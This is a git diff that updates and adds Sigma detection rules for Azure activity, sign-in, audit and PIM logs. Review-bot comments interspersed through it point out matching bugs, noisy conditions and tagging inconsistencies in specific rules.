@@ -1,28 +1,30 @@ title: Azure Kubernetes Service Account Modified or Deleted id: 12d027c3-b48c-4d9d-8bb6-a732200034b2 +status: test description: Identifies when a service account is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 - https://attack.mitre.org/matrices/enterprise/cloud/ +author: Austin Songer @austinsonger +date: 2021/08/07 +modified: 2022/08/23 +tags: + - attack.impact + - attack.t1531 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/WRITE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/DELETE - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/SERVICEACCOUNTS/IMPERSONATE/ACTION condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Service account modified or deleted from unfamiliar users should be investigated. 
If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_legacy_authentication_protocols.yml b/src/main/resources/rules/azure/azure_legacy_authentication_protocols.yml new file mode 100644 index 000000000..735d47762 --- /dev/null +++ b/src/main/resources/rules/azure/azure_legacy_authentication_protocols.yml @@ -0,0 +1,32 @@ +title: Use of Legacy Authentication Protocols +id: 60f6535a-760f-42a9-be3f-c9a0a025906e +status: test +description: Alert on when legacy authentication has been used on an account +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: Yochana Henderson, '@Yochana-H' +date: 2022/06/17 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1078.004 + - attack.t1110 +logsource: + product: azure + service: signinlogs +detection: + selection: + ActivityDetails: Sign-ins + ClientApp: + - Other client + - IMAP + - POP3 + - MAPI + - SMTP + - Exchange ActiveSync + - Exchange Web Services + Username: 'UPN' + condition: selection +falsepositives: + - User has been put in acception group so they can use legacy authentication +level: high diff --git a/src/main/resources/rules/azure/azure_login_to_disabled_account.yml b/src/main/resources/rules/azure/azure_login_to_disabled_account.yml index 41c45d939..360dd6745 100644 --- a/src/main/resources/rules/azure/azure_login_to_disabled_account.yml +++ b/src/main/resources/rules/azure/azure_login_to_disabled_account.yml 
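Review bot: The selection in the new file pins `Username: 'UPN'`, a literal placeholder rather than a field-to-value match, so the rule fires only when the signed-in user's name is literally the string UPN and otherwise never matches; `ActivityDetails: Sign-ins` likewise does not look like a field of the `signinlogs` source and may make the rule fail validation on backends that check field names. Drop both lines and keep just the `ClientApp` list, i.e. `selection:` / `ClientApp:` followed by the seven legacy values, and let consumers scope by user if needed. The falsepositives entry also reads "acception group" where "exception group" is meant. With `level: high`, a rule that cannot match is worse than no rule because it implies coverage that does not exist.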
@@ -1,22 +1,23 @@ title: Login to Disabled Account id: 908655e0-25cf-4ae1-b775-1c8ce9cf43d8 -status: experimental -author: AlertIQ -date: 2021/10/10 +status: test description: Detect failed attempts to sign in to disabled accounts. references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: AlertIQ +date: 2021/10/10 +modified: 2022/12/25 +tags: + - attack.initial_access + - attack.t1078.004 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - ResultType: 50057 - ResultDescription: 'User account is disabled. The account has been disabled by an administrator.' - condition: selection -level: medium + selection: + ResultType: 50057 + ResultDescription: 'User account is disabled. The account has been disabled by an administrator.' + condition: selection falsepositives: - - Unknown -tags: - - attack.initial_access - - attack.t1078 + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_mfa_denies.yml b/src/main/resources/rules/azure/azure_mfa_denies.yml index f0f63b75e..975236d45 100644 --- a/src/main/resources/rules/azure/azure_mfa_denies.yml +++ b/src/main/resources/rules/azure/azure_mfa_denies.yml 
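Review bot: The selection ANDs `ResultType: 50057` with an exact `ResultDescription` string, so any change in Microsoft's wording of that description, or a trimmed/localized variant in a given log pipeline, silently turns the rule off, while the numeric code alone already identifies the condition. Suggest matching on `ResultType: 50057` only, or at most `ResultDescription|contains: 'account is disabled'`, and keeping the full text in the description for analysts. The description says "failed attempts" but the rule reads no success/failure field; that holds only because 50057 is itself a failure code, which is worth a one-line note in the description.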
@@ -1,22 +1,25 @@ title: Multifactor Authentication Denied id: e40f4962-b02b-4192-9bfe-245f7ece1f99 -status: experimental -author: AlertIQ -date: 2022/03/24 +status: test description: User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account. references: - - https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ + - https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ +author: AlertIQ +date: 2022/03/24 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1078.004 + - attack.t1110 + - attack.t1621 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - AuthenticationRequirement: 'multiFactorAuthentication' - Status|contains: 'MFA Denied' - condition: selection -level: medium + selection: + AuthenticationRequirement: 'multiFactorAuthentication' + Status|contains: 'MFA Denied' + condition: selection falsepositives: - - Users actually login but miss-click into the Deny button when MFA prompt. -tags: - - attack.initial_access - - attack.t1078.004 + - Users actually login but miss-click into the Deny button when MFA prompt. +level: medium diff --git a/src/main/resources/rules/azure/azure_mfa_disabled.yml b/src/main/resources/rules/azure/azure_mfa_disabled.yml index d8ce54bce..378bd6e25 100644 --- a/src/main/resources/rules/azure/azure_mfa_disabled.yml +++ b/src/main/resources/rules/azure/azure_mfa_disabled.yml 
@@ -1,12 +1,14 @@ title: Disabled MFA to Bypass Authentication Mechanisms id: 7ea78478-a4f9-42a6-9dcd-f861816122bf -status: experimental +status: test description: Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms. -author: '@ionsor' -date: 2022/02/08 references: - - https://attack.mitre.org/techniques/T1556/ - https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates +author: '@ionsor' +date: 2022/02/08 +tags: + - attack.persistence + - attack.t1556 logsource: product: azure service: activitylogs @@ -19,6 +21,3 @@ detection: falsepositives: - Authorized modification by administrators level: medium -tags: - - attack.persistence - - attack.t1556 diff --git a/src/main/resources/rules/azure/azure_mfa_interrupted.yml b/src/main/resources/rules/azure/azure_mfa_interrupted.yml index 5919ea0fe..e6b395aed 100644 --- a/src/main/resources/rules/azure/azure_mfa_interrupted.yml +++ b/src/main/resources/rules/azure/azure_mfa_interrupted.yml 
@@ -1,25 +1,29 @@ -title: Multifactor Authentication Interupted +title: Multifactor Authentication Interrupted id: 5496ff55-42ec-4369-81cb-00f417029e25 -status: experimental -author: AlertIQ -date: 2021/10/10 +status: test description: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge. references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: AlertIQ +date: 2021/10/10 +modified: 2022/12/18 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1078.004 + - attack.t1110 + - attack.t1621 logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - ResultType: 50074 - ResultDescription|contains: 'Strong Auth required' - selection1: - ResultType: 500121 - ResultDescription|contains: 'Authentication failed during strong authentication request' - condition: selection or selection1 -level: medium + selection_50074: + ResultType: 50074 + ResultDescription|contains: 'Strong Auth required' + selection_500121: + ResultType: 500121 + ResultDescription|contains: 'Authentication failed during strong authentication request' + condition: 1 of selection_* falsepositives: - - Unknown -tags: - - attack.initial_access - - attack.t1078.004 + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml index a679d1892..bb51fbb34 100644 --- a/src/main/resources/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml 
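Review bot: `selection_50074` fires on `ResultType: 50074` / "Strong Auth required", which, as far as I know, is recorded as an interrupted sign-in every time a user is prompted for MFA, including routine successful logins, so on its own it is not evidence that the password is compromised; the rule's `falsepositives: - Unknown` understates this. Consider dropping 50074 or documenting it as a baseline signal and keeping 500121 (authentication actually failed during the strong-auth request) as the alerting one, and replacing `- Unknown` with `- Routine interactive MFA prompts produce 50074; alert on repeated events per user rather than single hits.`. The rename to `selection_*` with `1 of selection_*` is equivalent to the old `selection or selection1`.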
@@ -1,25 +1,28 @@ title: Azure Network Firewall Policy Modified or Deleted id: 83c17918-746e-4bd9-920b-8e098bf88c23 +status: test description: Identifies when a Firewall Policy is Modified or Deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/02 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/09/02 +modified: 2022/08/23 +tags: + - attack.impact + - attack.defense_evasion + - attack.t1562.007 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/FIREWALLPOLICIES/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/JOIN/ACTION - MICROSOFT.NETWORK/FIREWALLPOLICIES/CERTIFICATES/ACTION - MICROSOFT.NETWORK/FIREWALLPOLICIES/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml index 42ef6878a..e0a1bcb81 100644 
--- a/src/main/resources/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml @@ -1,25 +1,26 @@ title: Azure Firewall Rule Configuration Modified or Deleted id: 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 +status: test description: Identifies when a Firewall Rule Configuration is Modified or Deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULECOLLECTIONGROUPS/DELETE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/WRITE - MICROSOFT.NETWORK/FIREWALLPOLICIES/RULEGROUPS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium 
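Review bot: The tags block in the new layout still carries only `attack.impact`, while the companion firewall-policy rule just above in this patch tags the same kind of change with `attack.defense_evasion` and `attack.t1562.007` (Disable or Modify Cloud Firewall); editing rule collection groups is exactly that technique, so the two rules should agree. Add `- attack.defense_evasion` and `- attack.t1562.007` under `tags:` here.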
diff --git a/src/main/resources/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml index 16373fbd0..f2e353cc3 100644 --- a/src/main/resources/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml @@ -1,17 +1,20 @@ title: Azure Point-to-site VPN Modified or Deleted id: d9557b75-267b-4b43-922f-a775e2d1f792 +status: test description: Identifies when a Point-to-site VPN is Modified or Deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/P2SVPNGATEWAYS/WRITE - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DELETE - MICROSOFT.NETWORK/P2SVPNGATEWAYS/RESET/ACTION 
@@ -19,9 +22,7 @@ detection: - MICROSOFT.NETWORK/P2SVPNGATEWAYS/DISCONNECTP2SVPNCONNECTIONS/ACTION - MICROSOFT.NETWORK/P2SVPNGATEWAYS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_network_security_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_network_security_modified_or_deleted.yml index 395880e92..f256222b5 100644 --- a/src/main/resources/rules/azure/azure_network_security_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_network_security_modified_or_deleted.yml 
@@ -1,17 +1,20 @@ title: Azure Network Security Configuration Modified or Deleted id: d22b4df4-5a67-4859-a578-8c9a0b5af9df +status: test description: Identifies when a network security configuration is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WRITE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/DELETE - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/SECURITYRULES/WRITE @@ -19,9 +22,7 @@ detection: - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/JOIN/ACTION - MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/PROVIDERS/MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/WRITE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium 
diff --git a/src/main/resources/rules/azure/azure_network_virtual_device_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_network_virtual_device_modified_or_deleted.yml index 7e8ed5b4a..a79c2bef3 100644 --- a/src/main/resources/rules/azure/azure_network_virtual_device_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_network_virtual_device_modified_or_deleted.yml @@ -1,17 +1,22 @@ title: Azure Virtual Network Device Modified or Deleted id: 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 -description: Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/08 +status: test +description: | + Identifies when a virtual network device is being modified or deleted. + This can be a network interface, network virtual appliance, virtual hub, or virtual router. references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer @austinsonger +date: 2021/08/08 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE - MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE - MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE 
@@ -24,9 +29,7 @@ detection: - MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE - MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_new_cloudshell_created.yml b/src/main/resources/rules/azure/azure_new_cloudshell_created.yml index e06b47f2f..2895634e5 100644 --- a/src/main/resources/rules/azure/azure_new_cloudshell_created.yml +++ b/src/main/resources/rules/azure/azure_new_cloudshell_created.yml 
@@ -1,21 +1,22 @@ title: Azure New CloudShell Created id: 72af37e2-ec32-47dc-992b-bc288a2708cb +status: test description: Identifies when a new cloudshell is created inside of Azure portal. -author: Austin Songer -status: experimental -date: 2021/09/21 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer +date: 2021/09/21 +modified: 2022/08/23 +tags: + - attack.execution + - attack.t1059 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: MICROSOFT.PORTAL/CONSOLES/WRITE + operationName: MICROSOFT.PORTAL/CONSOLES/WRITE condition: selection -level: medium -tags: - - attack.execution - - attack.t1059 falsepositives: - - A new cloudshell may be created by a system administrator. + - A new cloudshell may be created by a system administrator. +level: medium diff --git a/src/main/resources/rules/azure/azure_owner_removed_from_application_or_service_principal.yml b/src/main/resources/rules/azure/azure_owner_removed_from_application_or_service_principal.yml index d32b447cf..6dc94f25e 100644 --- a/src/main/resources/rules/azure/azure_owner_removed_from_application_or_service_principal.yml +++ b/src/main/resources/rules/azure/azure_owner_removed_from_application_or_service_principal.yml 
@@ -1,24 +1,25 @@ title: Azure Owner Removed From Application or Service Principal id: 636e30d5-3736-42ea-96b1-e6e2f8429fd6 +status: test description: Identifies when a owner is was removed from a application or service principal in Azure. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/03 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +author: Austin Songer @austinsonger +date: 2021/09/03 +modified: 2022/10/09 +tags: + - attack.defense_evasion logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: - Remove owner from service principal - Remove owner from application condition: selection -level: medium -tags: - - attack.defense_evasion falsepositives: - - Owner being removed may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Owner being removed may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_pim_account_stale.yml b/src/main/resources/rules/azure/azure_pim_account_stale.yml new file mode 100644 index 000000000..f544b80e6 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_account_stale.yml 
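Review bot: The logsource keeps `service: activitylogs` while the selection matches the directory audit activity names `Remove owner from service principal` / `Remove owner from application`, and the cited reference is the Azure AD audit-activities page. If these events are emitted by the AAD audit log rather than the subscription activity log, the rule should declare `service: auditlogs`, as the PIM rules added in this same commit do; please confirm against the log schema before relying on the rule. The same question applies to azure_service_principal_created.yml and azure_service_principal_removed.yml later in this commit, which also pair `activitylogs` with audit activity names.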
@@ -0,0 +1,22 @@ +title: Stale Accounts In A Privileged Role +id: e402c26a-267a-45bd-9615-bd9ceda6da85 +status: experimental +description: Identifies when an account hasn't signed in during the past n number of days. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'staleSignInAlertIncident' + condition: selection +falsepositives: + - Investigate if potential generic account that cannot be removed. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_activation_approve_deny.yml b/src/main/resources/rules/azure/azure_pim_activation_approve_deny.yml new file mode 100644 index 000000000..e0cb9afc9 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_activation_approve_deny.yml @@ -0,0 +1,21 @@ +title: PIM Approvals And Deny Elevation +id: 039a7469-0296-4450-84c0-f6966b16dc6d +status: test +description: Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/09 +tags: + - attack.privilege_escalation + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Request Approved/Denied + condition: selection +falsepositives: + - Actual admin using PIM. +level: high 
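Review bot: In azure_pim_activation_approve_deny.yml, `properties.message: Request Approved/Denied` fires on every approval and every denial of a PIM activation request, which is routine traffic in a tenant that uses approval workflows; the falsepositives entry `Actual admin using PIM` concedes this, yet the rule is rated `level: high`. Denials are the more interesting signal (a requester who was refused a role), so if the log lets the two outcomes be told apart, a separate denial rule would carry the signal and the approval rule could drop to a lower level. Otherwise the description should say the rule is intended as an audit trail for correlation rather than a standalone alert.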
diff --git a/src/main/resources/rules/azure/azure_pim_alerts_disabled.yml b/src/main/resources/rules/azure/azure_pim_alerts_disabled.yml new file mode 100644 index 000000000..bcd081d77 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_alerts_disabled.yml @@ -0,0 +1,22 @@ +title: PIM Alert Setting Changes To Disabled +id: aeaef14c-e5bf-4690-a9c8-835caad458bd +status: test +description: Detects when PIM alerts are set to disabled. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/09 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1078 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Disable PIM Alert + condition: selection +falsepositives: + - Administrator disabling PIM alerts as an active choice. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_change_settings.yml b/src/main/resources/rules/azure/azure_pim_change_settings.yml new file mode 100644 index 000000000..c5ef56275 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_change_settings.yml 
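Review bot: Disabling PIM alerts is a defense-impairment action, but the tags map it only to `attack.persistence`, `attack.privilege_escalation` and `attack.t1078`; T1078 (Valid Accounts) describes the account being used, not the act of silencing alerting. `attack.defense_evasion` with `attack.t1562.001` (Impair Defenses: Disable or Modify Tools) describes what the matched event does, and can sit alongside the existing tags if the persistence angle is wanted.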
@@ -0,0 +1,22 @@ +title: Changes To PIM Settings +id: db6c06c4-bf3b-421c-aa88-15672b88c743 +status: test +description: Detects when changes are made to PIM roles +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment +author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H' +date: 2022/08/09 +tags: + - attack.privilege_escalation + - attack.persistence + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Update role setting in PIM + condition: selection +falsepositives: + - Legit administrative PIM setting configuration changes +level: high diff --git a/src/main/resources/rules/azure/azure_pim_invalid_license.yml b/src/main/resources/rules/azure/azure_pim_invalid_license.yml new file mode 100644 index 000000000..240624f6e --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_invalid_license.yml @@ -0,0 +1,22 @@ +title: Invalid PIM License +id: 58af08eb-f9e1-43c8-9805-3ad9b0482bd8 +status: experimental +description: Identifies when an organization doesn't have the proper license for PIM and is out of compliance. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'invalidLicenseAlertIncident' + condition: selection +falsepositives: + - Investigate if licenses have expired. +level: high 
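Review bot: In azure_pim_change_settings.yml, `description: Detects when changes are made to PIM roles` says something different from the title `Changes To PIM Settings` and from the match string `Update role setting in PIM`, which is a change to a role's PIM configuration rather than to its membership (membership changes are covered by the privileged-role-assignment rules in this commit). Suggest `description: Detects when the PIM settings of a privileged role are updated.`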
diff --git a/src/main/resources/rules/azure/azure_pim_role_assigned_outside_of_pim.yml b/src/main/resources/rules/azure/azure_pim_role_assigned_outside_of_pim.yml new file mode 100644 index 000000000..c36f8d16f --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_role_assigned_outside_of_pim.yml @@ -0,0 +1,22 @@ +title: Roles Assigned Outside PIM +id: b1bc08d1-8224-4758-a0e6-fbcfc98c73bb +status: experimental +description: Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'rolesAssignedOutsidePrivilegedIdentityManagementAlertConfiguration' + condition: selection +falsepositives: + - Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_role_frequent_activation.yml b/src/main/resources/rules/azure/azure_pim_role_frequent_activation.yml new file mode 100644 index 000000000..279cae7f0 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_role_frequent_activation.yml 
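Review bot: The `falsepositives` entry `Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there.` is a response step, not a benign explanation; the field is meant to tell an analyst which legitimate activity can trigger the rule. Suggest `- Legitimate direct role assignments made by an administrator through a path other than PIM` and move the "prohibit future assignments" guidance into the description.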
@@ -0,0 +1,22 @@ +title: Roles Activated Too Frequently +id: 645fd80d-6c07-435b-9e06-7bc1b5656cba +status: experimental +description: Identifies when the same privilege role has multiple activations by the same user. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence + - attack.privilege_escalation +logsource: + product: azure + service: pim +detection: + selection: + riskEventType: 'sequentialActivationRenewalsAlertIncident' + condition: selection +falsepositives: + - Investigate where if active time period for a role is set too short. +level: high diff --git a/src/main/resources/rules/azure/azure_pim_role_no_mfa_required.yml b/src/main/resources/rules/azure/azure_pim_role_no_mfa_required.yml new file mode 100644 index 000000000..3a0208402 --- /dev/null +++ b/src/main/resources/rules/azure/azure_pim_role_no_mfa_required.yml @@ -0,0 +1,22 @@ +title: Roles Activation Doesn't Require MFA +id: 94a66f46-5b64-46ce-80b2-75dcbe627cc0 +status: experimental +description: Identifies when a privilege role can be activated without performing mfa. +references: + - https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation +author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' +date: 2023/09/14 +tags: + - attack.t1078 + - attack.persistence 